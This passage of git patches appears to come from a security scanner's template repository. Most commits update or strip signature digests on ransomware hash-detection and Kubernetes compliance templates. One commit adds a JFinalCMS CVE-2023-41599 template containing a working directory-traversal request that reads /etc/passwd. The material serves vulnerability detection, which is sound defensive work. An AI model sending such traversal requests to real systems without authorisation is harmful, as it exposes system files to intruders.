490a00463044022076875f93e0837f92458a066ed23b9fbea85795d9bd3818b632f26b9830cdfe7f02200695449446fb36a39c556f565454dc45bdd1cf83850ce2f4eae8fc83426f858b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b49711d5f382a45f967310493ac48e353282795fb4003e0c6e10f877c40f9bf5022100de1ab0ab5f94537d999e2d12bc344df06638726e8aabac4788b66a9f47c68dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml index 7540215654..24c4e0c5be 100644 --- a/file/malware/hash/petya-ransomware-hash.yaml +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -17,4 +17,4 @@ file: - type: dsl dsl: - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" -# digest: 490a0046304402205fce9f775ef7254eef34677dcc81f51559dc834c5c2eeb672ff24d9324815f260220294f60f0d4ef47b431a13e731f08297d3752aee94eb353cc7e0675f59e2210f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206950b3d50bc113cfdcd2589c898ab99867e66e02123ae45c6952bce84c16a68f022011d17a5ae03002933cbbb1c55b298538f6d90040d716ead75525777d1b27e01b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/purplewave-malware-hash.yaml b/file/malware/hash/purplewave-malware-hash.yaml index 46a7d320fa..d0184253aa 100644 --- a/file/malware/hash/purplewave-malware-hash.yaml +++ b/file/malware/hash/purplewave-malware-hash.yaml @@ -25,4 +25,4 @@ file: - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" condition: or -# digest: 4a0a0047304502200a8245b0a3c7375545abcabcb3b33ffcff0a1eeb20bd2fc61b2cedd412a97af4022100f83b9afd37e264a8aad2d6e2fa7578dabf98dd1c0026bbe56e2c7b4a83067a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220697b99b706d2c5ba4e36e75d5cf9bc86654026c6b0ab367ed181f996e5b5a58e02202019b64c704f7e41def665c872f5523cf264b9ec55374ff62128cabad12eb9d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml index 9dba28d848..fb66dda3db 100644 --- a/file/malware/hash/revil-ransomware-hash.yaml +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -21,4 +21,4 @@ file: - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" condition: or -# digest: 490a00463044022030315d30078780deb8a78ae5d5f60f7cd37d74e1c5bfb3b6b64887f2f360e684022070842ec63bc9e309f9544b72d2af4ca7fea4f61feea98a8e688402a05223f797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0fb80f742f83b56f947a72305aba5f437fdb09c42c19f64005fd27f19dfbd890220334bc54f426a0027eeeabc1a9cbca96a9b84a92ca1173da50ffd112b07f9c3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5f33ddc7d24999d6541494bcd3913bc6bfc466c1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 25 Jun 2024 16:06:39 +0530 Subject: [PATCH 0612/1841] Create CVE-2023-41599.yaml --- http/cves/2023/CVE-2023-41599.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-41599.yaml diff --git a/http/cves/2023/CVE-2023-41599.yaml b/http/cves/2023/CVE-2023-41599.yaml new file mode 100644 index 0000000000..429ab5a56b --- /dev/null +++ b/http/cves/2023/CVE-2023-41599.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-41599 + +info: + name: JFinalCMS v5.0.0 - Directory Traversal + author: pussycat0x + severity: medium + description: | + An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal. + reference: + - https://github.com/wy876/POC/blob/main/JFinalCMS%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E(CVE-2023-41599).md + - https://github.com/wy876/POC + - https://github.com/xingchennb/POC- + - https://github.com/Marco-zcl/POC + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-41599 + cwe-id: CWE-22 + epss-score: 0.00047 + epss-percentile: 0.17113 + cpe: cpe:2.3:a:jfinalcms_project:jfinalcms:5.0.0:*:*:*:*:*:*:* + metadata: + vendor: jfinalcms_project + product: jfinalcms + fofa-query: body="content=\"JreCms" + tags: cve,cve2023,jrecms + +http: + - method: GET + path: + - "{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From f8af7088f8ff89175a3c964a27a91552182d7047 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 25 Jun 2024 15:08:46 +0400 Subject: [PATCH 0613/1841] removed signatures --- cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml | 1 - cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml | 1 - cloud/kubernetes/deployments/k8s-default-namespace-used.yaml | 1 - cloud/kubernetes/deployments/k8s-host-ports-check.yaml | 1 - cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml | 1 - cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml | 1 - .../deployments/k8s-liveness-probe-not-configured.yaml | 1 - cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml | 1 - cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml | 1 - .../kubernetes/deployments/k8s-minimize-added-capabilities.yaml | 1 - cloud/kubernetes/deployments/k8s-privileged-container.yaml | 1 - cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml | 1 - cloud/kubernetes/deployments/k8s-root-container-admission.yaml | 1 - cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml | 1 - cloud/kubernetes/kubernetes-code-env.yaml | 1 - cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml | 1 - cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml | 1 - cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml | 1 - cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml | 1 - cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml | 1 - cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml | 1 - cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml | 1 - cloud/kubernetes/pods/k8s-readonly-fs.yaml | 1 - cloud/kubernetes/pods/k8s-readonly-rootfs.yaml | 1 - cloud/kubernetes/pods/k8s-root-user-id.yaml | 1 - cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml | 1 - cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml | 1 - cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml | 1 - cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml | 1 - cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml | 1 - .../kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml | 1 - cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml | 1 - .../kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml | 1 - cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml | 1 - 34 files changed, 34 deletions(-) diff --git a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml index 3331f2e607..2f46aa8da1 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml @@ -46,4 +46,3 @@ javascript: - type: dsl dsl: - response -# digest: 490a0046304402207794d2cf587203ba357f4376862e445b2f8612f8fb9eee2683d45f445f4a450d02206387d8f375f6157ef9ac572a2595210e717fef4fcd935b5a7f243f806bea47f4:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml index a01635ee99..cafc8c7a9c 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml @@ -46,4 +46,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a0047304502205bb61869d917787455c6863fe6115682cf34d1267258db863a2e6380ccc9049d022100b783912d411495b9b93ed83dbd6318049f59fc40574db2c881e9b82e95566e4d:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml index 84d60d93c7..7f40c7120c 100644 --- a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml +++ b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml @@ -45,4 +45,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100f48af70d2fd53e58592c7c951684543c97128981f343667899279760d37658fb022017c6dc9cbae1b0be18b1e11214bc5e1f51d909339c63b354a8d56a62f496ab79:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml index d712e1f097..91d9c7701c 100644 --- a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml +++ b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml @@ -47,4 +47,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100f3a3753e5b3711de8e19eb7d96fe6cb9bbb71ea0d38975957c40c504f3469967022100c210bc6cb2adbcf0da1de9cd21c812ec890563c3cd8bb2edc76196cd311aecbd:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml index 86f2892484..3dbbce63c2 100644 --- a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml +++ b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml @@ -45,4 +45,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a0047304502200409430ae2d1311531b8e20737a1b5d8b93a3a57d0ddffa0003d34a99a4a06dd022100964eda202924507b711a38850dcae155eb2d3966b48557787e2c0e5a60c58e64:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml index 9211eecb08..910389489c 100644 --- a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml +++ b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml @@ -49,4 +49,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100a73d7f300303791070156f087c9a729d56361a04a4c2f11adb16ce3c66addd30022100e1ecf1ead4985f23fdbe80dafb0954bc5c17be9d036573d2cd40494c1fcddd7e:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml index 2039d0acf3..8c72b9b9dd 100644 --- a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml +++ b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 490a0046304402200d2e45e711a22fa4ab57ff3065de5eb87f78aa2904b41e829e3566b04de8109e02206750a88213ad16e78ffaf03980b9b7a6994acb71bdebaf83292d6608fa07a130:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml index b528dc243b..7a7dd42476 100644 --- a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a0047304502203a66813cc15b12b1260c6862926c6748694a84bc66c9ca24dff7052f998b5aaf022100ef69cce9aba0cb47d58dd0bc916ee54f02a32632a4749e98e7a22e3b92da0e8d:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml index e4913e6095..53dc9ce6af 100644 --- a/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100fe240dbf4c3fb7cc25858eae6a77ff3f3af8cce2dd2386358374f3bb179d1c2502210088357bf87098f8125c3a6038dde87ba3ac750d253e525b786f11013219119a7b:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml index 991f396b89..80f5bd596a 100644 --- a/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml +++ b/cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml @@ -48,4 +48,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100a4752be32718d5e3bf67d19c2c12b73dd2ddd70a44dc46ce8684cc5a70231e26022100f5f8e9f911051eeb8a41db141b0b2511c798e6d9be50aeef740011123d239ce6:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-privileged-container.yaml b/cloud/kubernetes/deployments/k8s-privileged-container.yaml index d8310da838..e3e31342a4 100644 --- a/cloud/kubernetes/deployments/k8s-privileged-container.yaml +++ b/cloud/kubernetes/deployments/k8s-privileged-container.yaml @@ -49,4 +49,3 @@ javascript: - type: dsl dsl: - response -# digest: 490a00463044022038295a725d25b77f920cfd32a5a407220f8f9c5faa37544670696f4cea356434022027fd56a2feae1101fe03c0d2e6e2452a2a89947f5c14e9711b8a744d11368b1e:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml index b29761b8a3..90c75fe195 100644 --- a/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml @@ -45,4 +45,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a004730450220592b68587cbae5ddf8d0c03554b81c57008a3878d45b2e878666aae7661e886d022100a8bffd45d8dcf071df20071daf0542bf6bbc9424e86c2aa38c522d7b10c6be3b:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml index dd59064962..4bc26452c0 100644 --- a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml +++ b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml @@ -45,4 +45,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a0047304502203296d04807538e04f058f6bbf7241e04ed2bf22ece4282aca6a268d9463a86cf022100abe93bb221464d568cbeb7cf07d382ea36e6987e9dca958912f6231b6c4e2cdf:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml index 1a331a788a..a4ff20d305 100644 --- a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml +++ b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml @@ -50,4 +50,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a004730450221008b59741a5c3cbb00fea807cbfad091c4bbd5b4cfb68d0eaba6cbad0f5b41b031022021a3ff36185afd480db929ad18207f2b03a2a823ec1d1858de0facf7fd7b2bbf:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/kubernetes-code-env.yaml b/cloud/kubernetes/kubernetes-code-env.yaml index 8c5a34b874..17072abfd9 100644 --- a/cloud/kubernetes/kubernetes-code-env.yaml +++ b/cloud/kubernetes/kubernetes-code-env.yaml @@ -28,4 +28,3 @@ code: - type: dsl dsl: - '"kubectl is successfully connected to the Kubernetes API Server Version: " + server_version' -# digest: 4a0a004730450220619359f90501cb0301a0a76aea235c33bf0d89d0295b92f754fedbadae743cad02210081662171da38b9b6cbeee60e25edb542f288457118bde3833e2ea4e784333f18:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml index c053894af2..a1e716471d 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100adb84e8a912b21d2e2bfd1f9253aec9cc33b6feb9fe7ee538ee0057e61ef8bb9022100d26ff6d9a2ac5f662df09dbb322793b0f9402594c96c361189367f58586344bc:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml index 349b01076e..ea945e764e 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml @@ -45,4 +45,3 @@ javascript: - type: dsl dsl: - response -# digest: 490a00463044022005edb8b78c4db40572f8297946636ce446d578c62f1ec7bf7f1621ed021f27c9022078555811953b55f080c0dc21ec6138fbd712b5069ca571e2492c5e7cc3172759:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml index 954d2348ae..2494492dcf 100644 --- a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml @@ -45,4 +45,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a004730450220506a30ff32ae7bcddc875449aabe33208c4437745e3f0ba016b3087a8d780fe2022100c1be39affffaa403e6022ded544a51e09ff5b41c4812601ee90848f89039ae3f:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml index b9e717d392..f40f9d8203 100644 --- a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -47,4 +47,3 @@ javascript: - type: dsl dsl: - response -# digest: 490a0046304402202e23ef1e6b258a44e394494f51808bb7b81a856101efe5a929429a6fcde414d4022058eacd480cb3e4b61fe6a86674f1f218b53144a3e8fed02c20554c0a34ae00d1:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml index b449495d9f..9c8f2bf72b 100644 --- a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml +++ b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100cc2146147ae70fb4bfc9d107d68d692ac4a287dfdaebfb356b425af0761eda00022100a8262c6003997d011ca625ceb8c1f8cc5e245c64c7306870001756811b39889b:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml index 2bc9bd222d..b39a650a22 100644 --- a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml +++ b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100e21998047fdf04b608359872be3fd0d5767bb0a3f6a7f8c66547c2ab9943fdfc02210089231ef6e0d74220e0fa8e2cfc7eec254e48299d53bfb4abe2891748a2e3187f:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml index 55296d3fc8..88eb65c93f 100644 --- a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml +++ b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a0047304502202982af00e2f77f8a8d34d3a60faa749adcc4621fcaa816c2f19f4f6fa109ef8a022100d768ba6500983f601db45742b46b488b4efee0e2e15389034b0000c2667b67d2:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-fs.yaml b/cloud/kubernetes/pods/k8s-readonly-fs.yaml index 24312b1075..2af51e9673 100644 --- a/cloud/kubernetes/pods/k8s-readonly-fs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-fs.yaml @@ -44,4 +44,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100822332f29c05236643aceb706c563112c463a6fdda5a60f391aaec1308fa9e3902207c8e95c0302c1f6f85c9a8e43e719b3e52c67684e4b5806e4e9ec0c44e1bfb20:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml index 3bbef35dbe..9d4f8f2885 100644 --- a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml @@ -47,4 +47,3 @@ javascript: - type: dsl dsl: - response -# digest: 490a0046304402205ca1449c5ae245df848df2d8b4117966ed8fc276841e0132e2844c643179f4c9022056438a03c5cb5402b1d07b3d1d88f123559df889348d5605c01ce0aedbedaf47:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-root-user-id.yaml b/cloud/kubernetes/pods/k8s-root-user-id.yaml index 666e61a880..2e9e83b50a 100644 --- a/cloud/kubernetes/pods/k8s-root-user-id.yaml +++ b/cloud/kubernetes/pods/k8s-root-user-id.yaml @@ -46,4 +46,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100c1eee5714a5bba3549ccef97ba37cc178ad76f7786c90732ff49d211d1d4153802204dae0cd7ef2c634e85d3d27a7feb5c9508f4066a91f7ef56f861ed86af5bb420:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml index 9b0af09a50..2aa43a9b77 100644 --- a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument."' -# digest: 4a0a0047304502204104b24f090bfea60d25246f47dd468a5696ce9e436fe282748f60d6c4929718022100c4902c1fc9855589dda168845c10e65647624c849700bcb556ada0418a10136a:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml index ac271d1834..107ee47641 100644 --- a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml +++ b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument"' -# digest: 4b0a00483046022100d14427c3db24f5ff548847a899b85731aa480204820c6d9916a85e01dfd67939022100aeefbe775d7dade76e9c6df085d0fca70f39ead3c3374b189912d92b646253ad:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml index 1c8a9f4cd5..d56db8ee5a 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"Etcd configuration is missing the " + argument + " argument"' -# digest: 4a0a004730450220594bb2a708ae66a4c884326cc844ef1f6886bf8a0b305630686bd04feeb76136022100fd52f890fc86dd1b66edf3798c51cda58cff07559fe9ea37f851eeec416fd052:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml index fa66bcccb1..da1b083822 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml @@ -40,4 +40,3 @@ code: - type: dsl dsl: - '"etcd server configuration is missing the " + argument + " arguments."' -# digest: 4a0a00473045022100cfc23ca747bd1aecd67bf39514f649aaaff7816196d78c5dc95666a03cb4c5090220365eb627df9b1bca710f3a45ef2371ab91d59dd2e43f3d180cd95b119ca758b3:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml index 8a8e1b3ccd..8ce989ef2e 100644 --- a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml +++ b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"Kubernetes cluster is not utilizing " + argument' -# digest: 490a0046304402202672a3c25ca835a804437f2745bf15f10a66112c320e7a5b51dfe586de57195d0220710bfe5832faacbd8efd9f24794ba191e008f325933688c53fc3a982a784da90:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml index 9086abfb7c..a7e5ef5d3a 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"API server configuration lacks the " + argument + " argument."' -# digest: 4a0a00473045022100c383c51f45c32761519dc9ae727df05e29281c3c290d9d57d16db6930fa148b20220228d5e842cdfd0f2c0b6cdf7361d18f45d9ed24f62d49ce47aa81ec2a470e548:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml index 25e93ee840..af092baee5 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument."' -# digest: 4b0a00483046022100d90abd4d95997cdae687e28ede25e595c3567439758ad5e5b8adf28ac88684ff022100a25db689afdc09e1640bf03bd0b212e5e20b0b4b1532723c985c617f99fb5ad8:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml index e628964fbf..9e436e093d 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml @@ -39,4 +39,3 @@ code: - type: dsl dsl: - '"API server configuration is missing the \"" + argument + "\" argument."' -# digest: 4b0a0048304602210085946e152e8d65fcadb1a22c5eac0e8376ed742a2f8932f74e3dbf2d30411a24022100c5c0c4d7313d6e28cb338c82c20170e4ae7f5b45ae784715be32160b4314e357:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml index b55ff705c9..aa3bd1f842 100644 --- a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml +++ 